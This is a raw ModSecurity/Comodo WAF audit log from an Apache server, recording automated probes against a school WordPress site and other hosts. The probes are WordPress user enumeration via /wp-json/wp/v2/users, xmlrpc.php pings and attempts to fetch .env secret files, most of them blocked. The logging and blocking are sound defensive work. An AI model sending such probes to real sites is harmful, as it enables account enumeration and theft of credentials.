1747449578233059 2564; combined=1214, p1=423, p2=761, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e02f751-Z-- --7d55a36a-A-- [17/May/2025:09:39:43 +0700] aCf27xKi5m5upc8uMd6irgAAAMs 103.236.140.4 46036 103.236.140.4 8181 --7d55a36a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d55a36a-C-- demo.sayHello --7d55a36a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d55a36a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449583190406 5742 (- - -) Stopwatch2: 1747449583190406 5742; combined=4088, p1=514, p2=3399, p3=31, p4=35, p5=66, sr=63, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d55a36a-Z-- --61826c2f-A-- [17/May/2025:09:39:43 +0700] aCf27wTOsBn9MSWb6WJvJgAAAIk 103.236.140.4 46038 103.236.140.4 8181 --61826c2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61826c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61826c2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449583222480 1344 (- - -) Stopwatch2: 1747449583222480 1344; combined=653, p1=212, p2=425, p3=0, p4=0, p5=16, sr=43, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61826c2f-Z-- --48eecc02-A-- [17/May/2025:09:39:50 +0700] aCf29nyxdQCiyU1ENFcovQAAABM 103.236.140.4 46064 103.236.140.4 8181 --48eecc02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48eecc02-C-- demo.sayHello --48eecc02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48eecc02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449590781431 5223 (- - -) Stopwatch2: 1747449590781431 5223; combined=4254, p1=501, p2=3482, p3=30, p4=36, p5=117, sr=72, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48eecc02-Z-- --b4458509-A-- [17/May/2025:09:41:25 +0700] aCf3VXyxdQCiyU1ENFco8AAAABM 103.236.140.4 46652 103.236.140.4 8181 --b4458509-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4458509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4458509-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449685342204 2482 (- - -) Stopwatch2: 1747449685342204 2482; combined=1252, p1=404, p2=814, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4458509-Z-- --90730266-A-- [17/May/2025:09:41:31 +0700] aCf3W3yxdQCiyU1ENFco9AAAABc 103.236.140.4 46668 103.236.140.4 8181 --90730266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --90730266-C-- demo.sayHello --90730266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --90730266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449691071409 4585 (- - -) Stopwatch2: 1747449691071409 4585; combined=3615, p1=436, p2=2909, p3=24, p4=25, p5=124, sr=68, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90730266-Z-- --a63d4601-A-- [17/May/2025:09:42:03 +0700] aCf3e3yxdQCiyU1ENFcpBgAAAAo 103.236.140.4 46848 103.236.140.4 8181 --a63d4601-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a63d4601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a63d4601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449723193318 2784 (- - -) Stopwatch2: 1747449723193318 2784; combined=1229, p1=416, p2=783, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a63d4601-Z-- --42518136-A-- [17/May/2025:09:42:10 +0700] aCf3ghKi5m5upc8uMd6i6AAAANc 103.236.140.4 46880 103.236.140.4 8181 --42518136-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42518136-C-- demo.sayHello --42518136-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42518136-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449730581739 5202 (- - -) Stopwatch2: 1747449730581739 5202; combined=4078, p1=492, p2=3367, p3=29, p4=29, p5=94, sr=70, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42518136-Z-- --5c406e2a-A-- [17/May/2025:09:42:34 +0700] aCf3mum4kjNN-hEbWjJCDAAAAFM 103.236.140.4 47080 103.236.140.4 8181 --5c406e2a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5c406e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c406e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747449754939557 766 (- - -) Stopwatch2: 1747449754939557 766; combined=298, p1=256, p2=0, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c406e2a-Z-- --fc292079-A-- [17/May/2025:09:44:01 +0700] aCf38em4kjNN-hEbWjJCNAAAAFY 103.236.140.4 47666 103.236.140.4 8181 --fc292079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc292079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc292079-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449841884474 3429 (- - -) Stopwatch2: 1747449841884474 3429; combined=1480, p1=468, p2=975, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc292079-Z-- --97cd623b-A-- [17/May/2025:09:44:07 +0700] aCf39wTOsBn9MSWb6WJvnwAAAJg 103.236.140.4 47710 103.236.140.4 8181 --97cd623b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97cd623b-C-- demo.sayHello --97cd623b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97cd623b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449847654003 6175 (- - -) Stopwatch2: 1747449847654003 6175; combined=4528, p1=596, p2=3659, p3=33, p4=32, p5=117, sr=139, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97cd623b-Z-- --bae83473-A-- [17/May/2025:09:47:10 +0700] aCf4rum4kjNN-hEbWjJCfwAAAFU 103.236.140.4 48712 103.236.140.4 8181 --bae83473-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bae83473-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bae83473-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450030516664 2769 (- - -) Stopwatch2: 1747450030516664 2769; combined=1292, p1=414, p2=849, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bae83473-Z-- --cda34815-A-- [17/May/2025:09:47:16 +0700] aCf4tBKi5m5upc8uMd6jTQAAANc 103.236.140.4 48756 103.236.140.4 8181 --cda34815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cda34815-C-- demo.sayHello --cda34815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda34815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450036202661 5868 (- - -) Stopwatch2: 1747450036202661 5868; combined=4271, p1=539, p2=3485, p3=31, p4=35, p5=105, sr=71, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda34815-Z-- --45ac0210-A-- [17/May/2025:09:53:12 +0700] aCf6GATOsBn9MSWb6WJwAgAAAJQ 103.236.140.4 49786 103.236.140.4 8181 --45ac0210-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45ac0210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ac0210-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747450392478935 829 (- - -) Stopwatch2: 1747450392478935 829; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ac0210-Z-- --e78fab2c-A-- [17/May/2025:09:55:23 +0700] aCf6mxKi5m5upc8uMd6jYgAAAM4 103.236.140.4 50402 103.236.140.4 8181 --e78fab2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e78fab2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e78fab2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450523890544 2642 (- - -) Stopwatch2: 1747450523890544 2642; combined=1400, p1=483, p2=888, p3=0, p4=0, p5=29, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e78fab2c-Z-- --2a725b08-A-- [17/May/2025:09:55:29 +0700] aCf6oQTOsBn9MSWb6WJwAwAAAJU 103.236.140.4 50424 103.236.140.4 8181 --2a725b08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a725b08-C-- demo.sayHello --2a725b08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a725b08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450529106470 5789 (- - -) Stopwatch2: 1747450529106470 5789; combined=4159, p1=520, p2=3460, p3=31, p4=33, p5=68, sr=65, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a725b08-Z-- --8d054772-A-- [17/May/2025:09:55:59 +0700] aCf6v3yxdQCiyU1ENFcrdQAAAAU 103.236.140.4 50558 103.236.140.4 8181 --8d054772-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d054772-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d054772-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450559447294 2769 (- - -) Stopwatch2: 1747450559447294 2769; combined=1227, p1=424, p2=774, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d054772-Z-- --5f07873f-A-- [17/May/2025:09:56:04 +0700] aCf6xBKi5m5upc8uMd6jZAAAANE 103.236.140.4 50560 103.236.140.4 8181 --5f07873f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f07873f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f07873f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450564071975 3244 (- - -) Stopwatch2: 1747450564071975 3244; combined=1431, p1=503, p2=897, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
